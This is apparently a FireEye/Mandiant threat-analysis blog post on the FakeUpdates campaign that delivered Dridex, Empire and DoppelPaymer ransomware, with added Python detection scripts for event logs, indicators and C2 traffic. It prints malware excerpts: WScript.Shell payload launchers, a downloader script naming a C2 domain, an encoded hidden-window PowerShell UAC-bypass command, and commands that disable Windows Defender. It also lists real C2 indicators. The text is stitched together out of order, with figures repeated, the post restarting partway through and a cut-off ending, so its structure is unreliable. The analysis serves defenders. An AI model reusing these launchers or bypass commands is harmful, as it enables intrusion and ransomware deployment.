              • NetSupport Manager Remote Access Tool (RAT) (Figure 8)
              • Chthonic or AZORult (Figure 9)

                  function runFile() {
                      var lastException = '';
                      try {
                          var wsh = new ActiveXObject("WScript.Shell");
                          wsh.Run('cmd /C rename "' + _tempFilePathSave + '" "' + execFileName + '"');
                          WScript.Sleep(3 * 1000);
                          runFileResult = wsh.Run('"' + _tempFilePathExec + '"');
                          lastException = '';
                      } catch (error) {
                          lastException = error.number;
                          runFileExeption += 'error number:' + error.number + ' message:' + error.message;
                      }
                  }

              Figure 7: Code excerpt observed in FakeUpdates used to launch Dridex payloads

                  function runFile() {
                      var lastException = '';
                      try {
                          var wsh = new ActiveXObject("WScript.Shell");
                          runFileResult = wsh.Run('"' + _tempFilePathExec + '" /verysilent');
                          lastException = '';
                      } catch (error) {
                          lastException = error.number;
                          runFileExeption += 'error number:' + error.number + ' message:' + error.message;
                      }
                  }

              Figure 8: Code excerpt observed in FakeUpdates used to launch NetSupport payloads

                  function runFile() {
                      var lastException = '';
                      try {
                          var wsh = new ActiveXObject("WScript.Shell");
                          runFileResult = wsh.Run('"' + _tempFilePathExec + '"');
                          lastException = '';
                      } catch (error) {
                          lastException = error.number;
                          runFileExeption += 'error number:' + error.number + ' message:' + error.message;
                      }
                  }

              Figure 9: Code excerpt observed in FakeUpdates used to launch Chthonic and AZORult payloads

              During this process, the victim system downloads and executes nircmdc.exe, a utility specifically used during the infection process to save two system screenshots. Figure 10 provides an example command used to capture the desktop screenshots.

              "C:\Users\User\AppData\Local\Temp\nircmdc.exe" savescreenshot "C:\Users\User\AppData\Local\Temp\6206a2e3dc14a3d91.png"

              Figure 10: Sample command used to execute the Nircmd tool to take desktop screenshots

              The PNG screenshots of the infected system are then transferred to the C2 server, after which they are deleted from the system. Figure 11 provides an example of an HTTP POST request, again with the custom Age and User-Agent headers.


              Figure 11: Screenshots of the infected system are sent to an attacker-controlled C2

              Interestingly, the screenshot file transfers were neither encoded nor obfuscated, unlike the other data elements transferred by the FakeUpdates malware. As soon as the screenshots are transferred, nircmdc.exe is deleted.

              All Hands on Deck

              In certain investigations, the incident was far from over. Following the distribution of Dridex v4 binaries (botnet IDs 199 and 501), new tools and frameworks began to appear. FireEye identified that the threat actors leveraged their Dridex backdoor(s) to execute the publicly-available PowerShell Empire and/or Koadic post-exploitation frameworks. Managed Defense also identified the FakeUpdates-to-Dridex infection chain resulting in the download and execution of PoshC2, another publicly available tool. While it could be coincidental, it is worth noting that the use of PoshC2 was first observed in early September 2019, following the announcement that Empire would no longer be maintained, and could represent a shift in attacker TTPs. These additional tools were often executed between 30 minutes and 2 hours after the initial Dridex download. The pace of the initial phases of related attacks suggests that automated post-compromise techniques may be used in part before interactive operator activity occurs.

              We identified extensive usage of Empire and C2 communication to various servers during these investigations. For example, via process tracking, we identified a Dridex-injected explorer.exe executing malicious PowerShell: a clear sign of an Empire stager:


              Figure 12: An example of PowerShell Empire stager execution revealed during forensic analysis

              In the above example, the threat actors instructed the victim system to use the remote server 185.122.59[.]78 for command-and-control using an out-of-the-box Empire agent C2 configuration for TLS-encrypted backdoor communications.

              During their hands-on post-exploitation activity, the threat actors also moved laterally via PowerShell remoting and RDP sessions. FireEye identified the use of WMI to create remote PowerShell processes, subsequently used to execute Empire stagers on domain-joined systems. In one specific case, the time delta between initial Empire backdoor and successful lateral movement was under 15 minutes. Another primary goal for the threat actor was internal reconnaissance of both the local system and domain the computer was joined to. Figure 13 provides a snippet of Active Directory reconnaissance commands issued by the attacker during one of our investigations.


              Figure 13: Attacker executed commands

              The threat actors used an Empire module named SessionGopher and the venerable Mimikatz to harvest endpoint session and credential information. Finally, we also identified that the attackers utilized Empire’s Invoke-EventVwrBypass, a Windows User Account Control bypass technique that launches executables via eventvwr.exe, as shown in Figure 14.

              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x


              Figure 14: PowerShell event viewer bypass

              Ransomware Attacks & Operator Tactics

              Within these investigations, FireEye identified the deployment of BitPaymer or DoppelPaymer ransomware. While these ransomware variants are highly similar, DoppelPaymer uses additional obfuscation techniques. It also has enhanced capabilities, including an updated network discovery mechanism and the requirement of specific command-line execution. DoppelPaymer also uses a different encryption and padding scheme.

              The ransomware and additional reconnaissance tools were downloaded through public file-sharing websites such as DropMeFiles and SendSpace. Irrespective of the ransomware deployed, the attacker used the Sysinternals utility PsExec to distribute and execute the ransomware.

              Notably, in the DoppelPaymer incident, FireEye identified that Dridex v2 with the Botnet ID 12333 was downloaded onto the same system previously impacted by an instance of Dridex v4 with Botnet ID 501. Within days, this secondary Dridex instance was then used to enable the distribution of DoppelPaymer ransomware. Prior to DoppelPaymer, the threat actor deleted volume shadow copies and disabled anti-virus and anti-malware protections on select systems. Event log artifacts revealed the commands executed through PowerShell to achieve this step (Figure 15):

              Event Log                                 | EID  | Message
              Microsoft-Windows-PowerShell%4Operational | 600  | HostApplication=powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true
              Microsoft-Windows-PowerShell%4Operational | 600  | HostApplication=powershell.exe Uninstall-WindowsFeature -Name Windows-Defender
              Application                               | 1034 | Windows Installer removed the product. Product Name: McAfee Agent-++-5.06.0011-++-1033-++-1603-++-McAfee, Inc.-++-(NULL)-++--++-. Product Version: 82.

              Figure 15: Event log entries related to the uninstallation of AV agents and disablement of real-time monitoring
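              The event log rows in Figure 15 and the hidden, encoded PowerShell launch in Figure 14 are exactly the kind of records a detection rule should key on, since disabling or removing endpoint protection shortly before ransomware deployment is the window in which containment is still possible. The following is an added example (not code from the original post or from FireEye) that runs a small rule set over constructed event records shaped like those rows; the record fields (log, eid, message), the rule names and the list of AV product keywords are this example’s own assumptions.

```python
import re
from typing import Dict, List

# Each rule is a name plus the regexes that must ALL match the event message.
# The patterns are this example's own; they cover the Figure 14 command line
# and the two PowerShell rows of Figure 15.
POWERSHELL_RULES = [
    ("defender-realtime-disabled",
     [r"Set-MpPreference\b", r"-DisableRealtimeMonitoring\s+\$?true\b"]),
    ("defender-feature-uninstalled",
     [r"Uninstall-WindowsFeature\b", r"Windows-Defender\b"]),
    # Hidden window plus an encoded command, as in the eventvwr bypass launcher.
    ("hidden-encoded-powershell",
     [r"-w(?:indowstyle)?\s+hidden\b", r"-e(?:nc|ncodedcommand)?\b"]),
    # Payload pulled from a registry value and handed to a second powershell.
    ("payload-read-from-registry",
     [r"\b(?:gp|Get-ItemProperty)\s+HK(?:CU|LM):"]),
]
COMPILED_RULES = [(name, [re.compile(p, re.IGNORECASE) for p in pats])
                  for name, pats in POWERSHELL_RULES]

# Illustrative product names for the Application/1034 (MSI removal) check
# (assumption: extend with whatever endpoint agents an environment runs).
AV_PRODUCT_KEYWORDS = ("mcafee", "windows defender", "symantec", "sophos", "trend micro")

TAMPER_RULES = {"defender-realtime-disabled", "defender-feature-uninstalled",
                "av-product-removed"}


def av_product_removed(event: Dict[str, object]) -> bool:
    """Windows Installer removal of a product that looks like a security agent."""
    msg = str(event["message"]).lower()
    return (event["log"] == "Application" and event["eid"] == 1034
            and "removed the product" in msg
            and any(k in msg for k in AV_PRODUCT_KEYWORDS))


def run_rules(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Evaluate every rule against every event; one hit per (event, rule)."""
    hits: List[Dict[str, object]] = []
    for index, event in enumerate(events):
        msg = str(event["message"])
        for name, patterns in COMPILED_RULES:
            if all(p.search(msg) for p in patterns):
                hits.append({"index": index, "rule": name})
        if av_product_removed(event):
            hits.append({"index": index, "rule": "av-product-removed"})
    return hits


def security_tooling_tampered(hits: List[Dict[str, object]]) -> bool:
    """True when at least two distinct tampering rules fired: a single event may be
    admin housekeeping, a sequence of them is the pre-ransomware pattern above."""
    return len({str(h["rule"]) for h in hits} & TAMPER_RULES) >= 2


# Constructed records mirroring Figure 15 and Figure 14, plus one benign event.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"log": "Microsoft-Windows-PowerShell%4Operational", "eid": 600,
     "message": "HostApplication=powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"log": "Microsoft-Windows-PowerShell%4Operational", "eid": 600,
     "message": "HostApplication=powershell.exe Uninstall-WindowsFeature -Name Windows-Defender"},
    {"log": "Application", "eid": 1034,
     "message": "Windows Installer removed the product. Product Name: McAfee Agent-++-5.06.0011"
                "-++-1033-++-1603-++-McAfee, Inc.-++-(NULL)-++--++-. Product Version: 82."},
    {"log": "Microsoft-Windows-PowerShell%4Operational", "eid": 600,
     "message": r'HostApplication="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'
                r' -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update);'
                r' powershell -NoP -NonI -W Hidden -enc $x'},
    {"log": "Microsoft-Windows-PowerShell%4Operational", "eid": 600,
     "message": "HostApplication=powershell.exe Get-Process | Sort-Object CPU -Descending"},
]

if __name__ == "__main__":
    found = run_rules(SAMPLE_EVENTS)
    for hit in found:
        print(hit)
    print("tampering sequence:", security_tooling_tampered(found))
```

              The two-rule threshold in security_tooling_tampered is deliberate: a lone Set-MpPreference change happens during legitimate troubleshooting, but real-time monitoring being disabled, the Defender feature being uninstalled and a third-party agent being removed by MSI on the same host within a short window is what preceded DoppelPaymer here, and the same rules fire regardless of which PowerShell log source (script block, module or operational) supplied the message.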

              The DoppelPaymer ransomware was found in an Alternate Data Stream (ADS) in randomly named files on disk. ADSs are attributes within NTFS that allow for a file to have multiple data streams, with only the primary being visible in tools such as Windows Explorer. After ransomware execution, files are indicated as encrypted by being renamed with a “.locked” file extension. In addition to each “.locked” file, there is a ransom note with the file name “readme2unlock.txt” which provides instructions on how to decrypt files.


              Figure 16: DoppelPaymer ransomware note observed during a Mandiant Incident Response investigation

              Ransomware? Not In My House!

              Over the past few years, we have seen ransomware graduate from a nuisance malware to one being used to extort victim networks out of significant sums of money. Furthermore, threat actors are now coupling ransomware with multiple toolkits or other malware families to gain stronger footholds into an environment. In this blog post alone, we witnessed a threat actor move through multiple toolsets - some automated, some manual - with the ultimate goal of holding the victim organization hostage.

              Ransomware also raises the stakes for unprepared organizations, as it levels the playing field across all areas of your enterprise. Ransomware proves that threat actors don’t need access to the most sensitive parts of your organization; they need access to the ones that will disrupt business processes. This widens your attack surface but, luckily, also gives you more opportunity for detection and response. Mandiant recently published an in-depth white paper on Ransomware Protection and Containment Strategies, which may help organizations mitigate the risk of ransomware events.

              Indicators

              The following indicator set is a collective representation of artifacts identified during investigations into multiple customer compromises.

              Type                               | Indicator(s)
              FakeUpdates Files                  | 0e470395b2de61f6d975c92dea899b4f
                                                 | 7503da20d1f83ec2ef2382ac13e238a8
                                                 | 102ae3b46ddcb3d1d947d4f56c9bf88c
                                                 | aaca5e8e163503ff5fadb764433f8abb
                                                 | 2c444002be9847e38ec0da861f3a702b
                                                 | 62eaef72d9492a8c8d6112f250c7c4f2
                                                 | 175dcf0bd1674478fb7d82887a373174
                                                 | 10eefc485a42fac3b928f960a98dc451
                                                 | a2ac7b9c0a049ceecc1f17022f16fdc6
              FakeUpdates Domains & IP Addresses | <8-Characters>.green.mattingsolutions[.]co
                                                 | <8-Characters>.www2.haciendarealhoa[.]com
                                                 | <8-Characters>.user3.altcoinfan[.]com
                                                 | 93.95.100[.]178
                                                 | 130.0.233[.]178
                                                 | 185.243.115[.]84
                                                 | gnf6.ruscacademy[.]in
                                                 | backup.awarfaregaming[.]com
                                                 | click.clickanalytics208[.]com
                                                 | track.amishbrand[.]com
                                                 | track.positiverefreshment[.]org
                                                 | link.easycounter210[.]com
              nircmdc.exe                        | 8136d84d47cb62b4a4fe1f48eb64166e
              Dridex                             | 7239da273d3a3bfd8d169119670bb745
                                                 | 72fe19810a9089cd1ec3ac5ddda22d3f
                                                 | 07b0ce2dd0370392eedb0fc161c99dc7
                                                 | c8bb08283e55aed151417a9ad1bc7ad9
                                                 | 6e05e84c7a993880409d7a0324c10e74
                                                 | 63d4834f453ffd63336f0851a9d4c632
                                                 | 0ef5c94779cd7861b5e872cd5e922311
              Empire C2                          | 185.122.59[.]78
                                                 | 109.94.110[.]136
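              Three of the domain indicators above are templates (an eight-character first label in front of a fixed suffix), and all of them are published defanged with “[.]”, so pasting them into a blocklist verbatim would match nothing. The following is an added example (not code from the original post or from FireEye) that refangs the network indicators from the table, compiles the templated domains into anchored patterns, and matches them against log lines. The log format (dns_query, dst_host, dst_ip fields), the workstation names and the sample lines are constructed for the example, and treating “<8-Characters>” as eight alphanumerics is an assumption the post does not state.

```python
import re
from typing import Dict, List, Pattern, Set

# Network indicators copied from the post's table, kept defanged ([.]) as published.
FAKEUPDATES_DOMAINS = [
    "<8-Characters>.green.mattingsolutions[.]co",
    "<8-Characters>.www2.haciendarealhoa[.]com",
    "<8-Characters>.user3.altcoinfan[.]com",
    "gnf6.ruscacademy[.]in",
    "backup.awarfaregaming[.]com",
    "click.clickanalytics208[.]com",
    "track.amishbrand[.]com",
    "track.positiverefreshment[.]org",
    "link.easycounter210[.]com",
]
FAKEUPDATES_IPS = ["93.95.100[.]178", "130.0.233[.]178", "185.243.115[.]84"]
EMPIRE_C2_IPS = ["185.122.59[.]78", "109.94.110[.]136"]


def refang(indicator: str) -> str:
    """Turn the published defanged form back into a matchable, normalised value."""
    return indicator.replace("[.]", ".").strip().lower()


def domain_pattern(indicator: str) -> Pattern[str]:
    """Compile one domain indicator into an anchored regex.

    '<8-Characters>' is treated as exactly eight alphanumerics (assumption:
    the post does not state the alphabet). Every other label is matched literally.
    """
    labels = []
    for label in refang(indicator).split("."):
        labels.append(r"[a-z0-9]{8}" if label == "<8-characters>" else re.escape(label))
    return re.compile(r"^" + r"\.".join(labels) + r"$")


DOMAIN_MATCHERS: Dict[str, List[Pattern[str]]] = {
    "fakeupdates-domain": [domain_pattern(d) for d in FAKEUPDATES_DOMAINS],
}
IP_MATCHERS: Dict[str, Set[str]] = {
    "fakeupdates-ip": {refang(i) for i in FAKEUPDATES_IPS},
    "empire-c2": {refang(i) for i in EMPIRE_C2_IPS},
}

# Field names below are this example's own log format, not a product schema.
HOST_FIELD_RE = re.compile(r"\b(?:dns_query|dst_host)=(\S+)")
IP_FIELD_RE = re.compile(r"\bdst_ip=(\S+)")


def match_line(line: str) -> List[Dict[str, str]]:
    """Return every indicator hit in one log line (anchored, exact matches only)."""
    hits: List[Dict[str, str]] = []
    for host in HOST_FIELD_RE.findall(line):
        host = host.rstrip(".").lower()  # tolerate a trailing dot from DNS logs
        for category, patterns in DOMAIN_MATCHERS.items():
            if any(p.match(host) for p in patterns):
                hits.append({"category": category, "value": host})
    for ip in IP_FIELD_RE.findall(line):
        for category, ips in IP_MATCHERS.items():
            if ip in ips:
                hits.append({"category": category, "value": ip})
    return hits


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Scan a whole log, tagging each hit with its 1-based line number."""
    hits: List[Dict[str, str]] = []
    for number, line in enumerate(lines, 1):
        for hit in match_line(line):
            hit["line"] = str(number)
            hits.append(hit)
    return hits


# Constructed sample log lines (not real telemetry).
SAMPLE_LOG_LINES = [
    "2019-08-14T10:02:11Z host=WS-0417 dns_query=ab12cd34.green.mattingsolutions.co",
    "2019-08-14T10:02:12Z host=WS-0417 dns_query=gnf6.ruscacademy.in.",
    "2019-08-14T10:02:15Z host=WS-0417 dns_query=www.example.invalid",
    "2019-08-14T10:02:40Z host=WS-0417 dst_ip=185.122.59.78 dst_port=443",
    "2019-08-14T10:03:01Z host=WS-0221 dns_query=toolong123.green.mattingsolutions.co",
    "2019-08-14T10:03:05Z host=WS-0221 dst_ip=185.122.59.178 dst_port=443",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG_LINES):
        print(hit)
```

              The patterns are anchored at both ends on purpose: a substring match on “185.122.59.78” would also fire on 185.122.59.178, and a loose match on the templated suffix would fire on the parent domain itself, which may be a legitimate compromised site rather than attacker infrastructure.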

              Detecting the Techniques

              FireEye detects this activity across our platforms, including named detections for Dridex, Empire, BitPaymer and DoppelPaymer Ransomware. As a result of these investigations, FireEye additionally deployed new indicators and signatures to Endpoint and Network Security appliances.  This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

              Platform          | Signature Name
              Endpoint Security | HX Exploit Detection
                                | Empire RAT (BACKDOOR)
                                | EVENTVWR PARENT PROCESS (METHODOLOGY)
                                | Dridex (BACKDOOR)
                                | Dridex A (BACKDOOR)
                                | POWERSHELL SSL VERIFICATION DISABLE (METHODOLOGY)
                                | SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
                                | FAKEUPDATES SCREENSHOT CAPTURE (METHODOLOGY)
              Network Security  | Backdoor.FAKEUPDATES
                                | Trojan.Downloader.FakeUpdate
                                | Exploit.Kit.FakeUpdate
                                | Trojan.SSLCert.SocGholish

              MITRE ATT&CK Technique Mapping

              ATT&CK               | Techniques
              Initial Access       | Drive-by Compromise (T1189), Exploit Public-Facing Application (T1190)
              Execution            | PowerShell (T1086), Scripting (T1064), User Execution (T1204), Windows Management Instrumentation (T1047)
              Persistence          | DLL Search Order Hijacking (T1038)
              Privilege Escalation | Bypass User Account Control (T1088), DLL Search Order Hijacking (T1038)
              Defense Evasion      | Bypass User Account Control (T1088), Disabling Security Tools (T1089), DLL Search Order Hijacking (T1038), File Deletion (T1107), Masquerading (T1036), NTFS File Attributes (T1096), Obfuscated Files or Information (T1027), Scripting (T1064), Virtualization/Sandbox Evasion (T1497)
              Credential Access    | Credential Dumping (T1003)
              Discovery            | Account Discovery (T1087), Domain Trust Discovery (T1482), File and Directory Discovery (T1083), Network Share Discovery (T1135), Process Discovery (T1057), Remote System Discovery (T1018), Security Software Discovery (T1063), System Information Discovery (T1082), System Network Configuration Discovery (T1016), Virtualization/Sandbox Evasion (T1497)
              Lateral Movement     | Remote Desktop Protocol (T1076), Remote File Copy (T1105)
              Collection           | Data from Local System (T1005), Screen Capture (T1113)
              Command And Control  | Commonly Used Port (T1436), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Data Obfuscation (T1001), Remote Access Tools (T1219), Remote File Copy (T1105), Standard Application Layer Protocol (T1071)
              Exfiltration         | Automated Exfiltration (T1020), Exfiltration Over Command and Control Channel (T1041)
              Impact               | Data Encrypted for Impact (T1486), Inhibit System Recovery (T1490), Service Stop (T1489)

              Acknowledgements

              A huge thanks to James Wyke and Jeremy Kennelly for their analysis of this activity and support of this post.

              Catch an on-demand recap on this and the Top 5 Managed Defense attacks this year.

              Head Fake: Tackling Disruptive Ransomware Attacks

              Within the past several months, FireEye has observed financially-motivated threat actors employ tactics that focus on disrupting business processes by deploying ransomware in mass throughout a victim’s environment. Understanding that normal business processes are critical to organizational success, these ransomware campaigns have been accompanied with multi-million dollar ransom amounts. In this post, we’ll provide a technical examination of one recent campaign that stems back to a technique that we initially reported on in April 2018.

              Between May and September 2019, FireEye responded to multiple incidents involving a financially-motivated threat actor who leveraged compromised web infrastructure to establish an initial foothold in victim environments. This activity bared consistencies with a fake browser update campaign first identified in April 2018 – now tracked by FireEye as FakeUpdates. In this newer campaign, the threat actors leveraged victim systems to deploy malware such as Dridex or NetSupport, and multiple post-exploitation frameworks. The threat actors’ ultimate goal in some cases was to ransom systems in mass with BitPaymer or DoppelPaymer ransomware (see Figure 1).


              Figure 1: Recent FakeUpdates infection chain

              Due to campaign proliferation, we have responded to this activity at both Mandiant Managed Defense customers and incident response investigations performed by Mandiant. Through Managed Defense network and host monitoring as well as Mandiant’s incident response findings, we observed the routes the threat actor took, the extent of the breaches, and exposure of their various toolkits.

              Knock, Knock: FakeUpdates are Back!

              In April 2018, FireEye identified a campaign that used compromised websites to deliver heavily obfuscated Trojan droppers masquerading as Chrome, Internet Explorer, Opera, and/or Firefox browser updates. The compromised sites contained code injected directly into the HTML or in JavaScript components rendered by the pages which had been injected. These sites were accessed by victim users either via HTTP redirects or watering-hole techniques utilized by the attackers.

              Since our April 2018 blog post, this campaign has been refined to include new techniques and the use of post-exploitation toolkits. Recent investigations have shown threat actor activity that included internal reconnaissance, credential harvesting, privilege escalation, lateral movement, and ransomware deployment in enterprise networks. FireEye has identified that a large number of the compromised sites serving up the first stage of FakeUpdates have been older, vulnerable Content Management System (CMS) applications.

              You Are Using an Older Version…of our Malware

              The FakeUpdates campaign begins with a rather intricate sequence of browser validation, performed before the final payload is downloaded. Injected code on the initial compromised page will make the user’s browser transparently navigate to a malicious website using hard-coded parameters. After victim browser information is gleaned, additional redirects are performed and the user is prompted to download a fake browser update. FireEye has observed that the browser validation sequence may have additional protections to evade sandbox detections and post-incident triage attempts on the compromise site(s).


              Figure 2: Example of FakeUpdate landing page after HTTP redirects

              The redirect process used numerous subdomains, with a limited number of IP addresses. The malicious subdomains are often changed in different parts of the initial redirects and browser validation stages.

              After clicking the ‘Update’ button, we observed the downloading of one of three types of files:

              • Heavily-obfuscated HTML applications (.hta file extensions)
              • JavaScript files (.js file extensions)
              • ZIP-compressed JavaScript files (.zip extensions)

              Figure 3 provides a snippet of JavaScript that provides the initial download functionality.

              var domain = '//gnf6.ruscacademy[.]in/';
              var statisticsRequest = 'wordpress/news.php?b=612626&m=ad2219689502f09c225b3ca0bfd8e333&y=206';
              var statTypeParamName = 'st';

              var filename = 'download.hta';
              var browser = 'Chrome';
              var special = '1';   
              var filePlain = window.atob(file64);
              var a = document.getElementById('buttonDownload');

              Figure 3: Excerpts of JavaScript code identified from the FakeUpdates landing pages

              When the user opens the initial FakeUpdates downloader, the Windows Scripting Host (wscript.exe) is executed and the following actions are performed:

              1. A script is executed in memory and used to fingerprint the affected system.
              2. A subsequent backdoor or banking trojan is downloaded if the system is successfully fingerprinted.
              3. A script is executed in memory which:
                • Downloads and launches a third party screenshot utility.
                • Sends the captured screenshots to an attacker.
              4. The payload delivered in step 2 is subsequently executed by the script process.

              The backdoor and banking-trojan payloads described above have been identified as Dridex, NetSupport Manager RAT, AZOrult, and Chthonic malware. The strategy behind the selective payload delivery is unclear; however, the most prevalent malware delivered during this phase of the infection chain were variants of the Dridex backdoor.

              FakeUpdates: More like FakeHTTP

              After the end user executes the FakeUpdates download, the victim system will send a custom HTTP POST request to a hard-coded Command and Control (C2) server. The POST request, depicted in Figure 4, showed that the threat actors used a custom HTTP request for initial callback. The Age HTTP header, for example, was set to a string of 16 seemingly-random lowercase hexadecimal characters.


              Figure 4: Initial HTTP communication after successful execution of the FakeUpdates dropper

              The HTTP Age header typically represents the time in seconds since an object has been cached by a proxy. In this case, via analysis of the obfuscated code on disk, FireEye identified that the Age header correlates to a scripted “auth header” parameter; likely used by the C2 server to validate the request. The first HTTP POST request also contains an XOR-encoded HTTP payload variable “a=”.

              The C2 server responds to the initial HTTP request with encoded JavaScript. When the code is decoded and subsequently executed, system and user information is collected using wscript.exe. The information collected from the victim system included:

              • The malicious script that initialized the callback
              • System hostname
              • Current user account
              • Active Directory domain
              • Hardware details, such as manufacturer
              • Anti-virus software details
              • Running processes

              This activity is nearly identical to the steps observed in our April 2018 post, indicating only minor changes in data collection during this stage. For example, in the earlier iteration of this campaign, we did not observe the collection of the script responsible for the C2 communication. Following the system information gathering, the data is XOR-encoded and sent via another custom HTTP POST request to the same C2 server, with the data included in the parameter “b=”. Figure 5 provides a snippet of a sample second HTTP request.


              Figure 5: Second HTTP POST request after successful system information gathering

              Figure 6 provides a copy of the decoded content, showing the various data points the malware transmitted back to the C2 server.

              0=500
              1=C:\Users\User\AppData\Local\Temp\Chrome.js
              2=AMD64
              3=SYSTEM1
              4=User
              5=4
              6=Windows_NT
              7=DOMAIN
              8=HP
              9=HP EliteDesk
              10=BIOS_VERSION
              11=Windows Defender|Vendor Anti-Virus
              12=Vendor Anti-Virus|Windows Defender|
              13=00:00:00:00:00:00
              14=Enhanced (101- or 102-key)
              15=USB Input Device
              16=1024x768
              17=System Idle Process|System|smss.exe|csrss.exe|wininit.exe|csrss.exe|winlogon.exe|services.exe|lsass.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|spoolsv.exe|svchost.exe|svchost.exe|HPLaserJetService.exe|conhost.exe…

              Figure 6: Decoded system information gathered by the FakeUpdates malware
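As an added example (not FireEye's code), a small Python triage routine for the callback traits described above: it flags POST requests whose Age header is 16 lowercase hex characters rather than the delta-seconds RFC 7234 defines, and whose body is a single XOR-encoded `a=`/`b=` parameter, then decodes a constructed `b=` upload into the numbered fields of Figure 6. The sample requests, the XOR key and the index-to-field labels are assumptions for the example, not values from the post.

```python
import re

# Traits the post describes: Age header is 16 lowercase hex chars (an "auth header"),
# and the body is one XOR-encoded parameter ("a=" first callback, "b=" system info).
HEX16 = re.compile(r"^[0-9a-f]{16}$")
DELTA_SECONDS = re.compile(r"^\d+$")   # RFC 7234: Age = delta-seconds

# Labels for the numbered fields of Figure 6. Only the categories the post lists
# (hostname, user, domain, hardware, AV, processes) are confirmed; the exact
# index-to-field mapping below is inferred from the sample values (an assumption).
FIELD_LABELS = {
    1: "script_path", 2: "arch", 3: "hostname", 4: "user", 6: "os",
    7: "domain", 8: "manufacturer", 9: "model", 10: "bios",
    11: "av_products", 12: "av_products_alt", 16: "screen", 17: "processes",
}

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; symmetric, so it both encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method = lines[0].split(" ", 1)[0]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, headers, body

def triage(raw: bytes) -> list:
    """Return the reasons a request looks like a FakeUpdates callback (empty if none)."""
    method, headers, body = parse_request(raw)
    reasons = []
    age = headers.get("age")
    if age is not None and method == "POST":
        # Age is a response header; a client sending it at all is suspicious by itself.
        reasons.append("request carries the Age header")
        if HEX16.match(age):
            reasons.append("Age value is 16 lowercase hex chars, not delta-seconds")
        elif not DELTA_SECONDS.match(age):
            reasons.append("Age value is not delta-seconds")
    m = re.fullmatch(rb"([ab])=(.*)", body, re.S)
    if m and m.group(2):
        param, value = m.group(1).decode(), m.group(2)
        nonprint = sum(1 for b in value if not 32 <= b < 127)
        if nonprint / len(value) > 0.2:
            reasons.append(f"single '{param}=' parameter, {nonprint}/{len(value)} "
                           "bytes non-printable (encoded payload)")
    return reasons

def parse_system_info(decoded: str) -> dict:
    """Map the 'N=value' lines of the decoded upload to named fields; '|' lists are split."""
    info = {}
    for line in decoded.splitlines():
        idx, _, value = line.partition("=")
        if not idx.isdigit():
            continue
        name = FIELD_LABELS.get(int(idx), f"field_{idx}")
        info[name] = [p.strip() for p in value.split("|") if p.strip()] if "|" in value else value
    return info

def decode_upload(raw: bytes, key: bytes) -> dict:
    """Strip the 'b=' prefix, XOR-decode the body and parse the numbered fields."""
    _, _, body = parse_request(raw)
    return parse_system_info(xor_bytes(body[2:], key).decode("latin-1"))

# Constructed sample, not captured traffic. KEY is an assumed value used only to build
# the sample (every byte has bit 7 set, so ASCII plaintext becomes non-printable).
KEY = bytes([0x9c, 0xa7, 0xe3])
SYSTEM_INFO = ("0=500\n1=C:\\Users\\User\\AppData\\Local\\Temp\\Chrome.js\n2=AMD64\n"
               "3=SYSTEM1\n4=User\n6=Windows_NT\n7=DOMAIN\n8=HP\n9=HP EliteDesk\n"
               "11=Windows Defender|Vendor Anti-Virus\n17=System|smss.exe|csrss.exe|\n")

def build_request(param: str, plaintext: str) -> bytes:
    body = param.encode() + b"=" + xor_bytes(plaintext.encode(), KEY)
    return (b"POST /update HTTP/1.1\r\nHost: c2-placeholder.invalid\r\n"   # placeholder host
            b"Age: 3f9ac21b7d04e6a8\r\nContent-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)

SAMPLE_UPLOAD = build_request("b", SYSTEM_INFO)
BENIGN = b"POST /api HTTP/1.1\r\nHost: app-placeholder.invalid\r\n\r\nuser=alice&action=login"

if __name__ == "__main__":
    for reason in triage(SAMPLE_UPLOAD):
        print("[!]", reason)
    print(decode_upload(SAMPLE_UPLOAD, KEY))
```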

              After receiving the system information, the C2 server responds with an encoded payload delivered via chunked transfer-encoding to the infected system. This technique evades conventional IDS/IPS appliances, allowing for the second-stage payload to successfully download. During our investigations and FireEye Intelligence’s monitoring, we recovered encoded payloads that delivered one of the following:

              • Dridex (Figure 7)
              • NetSupport Manager Remote Access Tool (RAT) (Figure 8)
              • Chthonic or AZORult (Figure 9)
                  function runFile() {
                      var lastException = '';
                      try {
                          var wsh = new ActiveXObject("WScript.Shell");
                          wsh.Run('cmd /C rename "' + _tempFilePathSave + '" "' + execFileName + '"');
                          WScript.Sleep(3 * 1000);
                          runFileResult = wsh.Run('"' + _tempFilePathExec + '"');
                          lastException = '';
                      } catch (error) {
                          lastException = error.number;
                          runFileExeption += 'error number:' + error.number + ' message:' + error.message;
                      }
                  }

              Figure 7: Code excerpt observed in FakeUpdates used to launch Dridex payloads

                  function runFile() {
                      var lastException = '';
                      try {
                          var wsh = new ActiveXObject("WScript.Shell");
                          runFileResult = wsh.Run('"' + _tempFilePathExec + '" /verysilent');
                          lastException = '';
                      } catch (error) {
                          lastException = error.number;
                          runFileExeption += 'error number:' + error.number + ' message:' + error.message;
                      }
                  }

              Figure 8: Code excerpt observed in FakeUpdates used to launch NetSupport payloads

                  function runFile() {
                      var lastException = '';
                      try {
                          var wsh = new ActiveXObject("WScript.Shell");
                          runFileResult = wsh.Run('"' + _tempFilePathExec + '"');
                          lastException = '';
                      } catch (error) {
                          lastException = error.number;
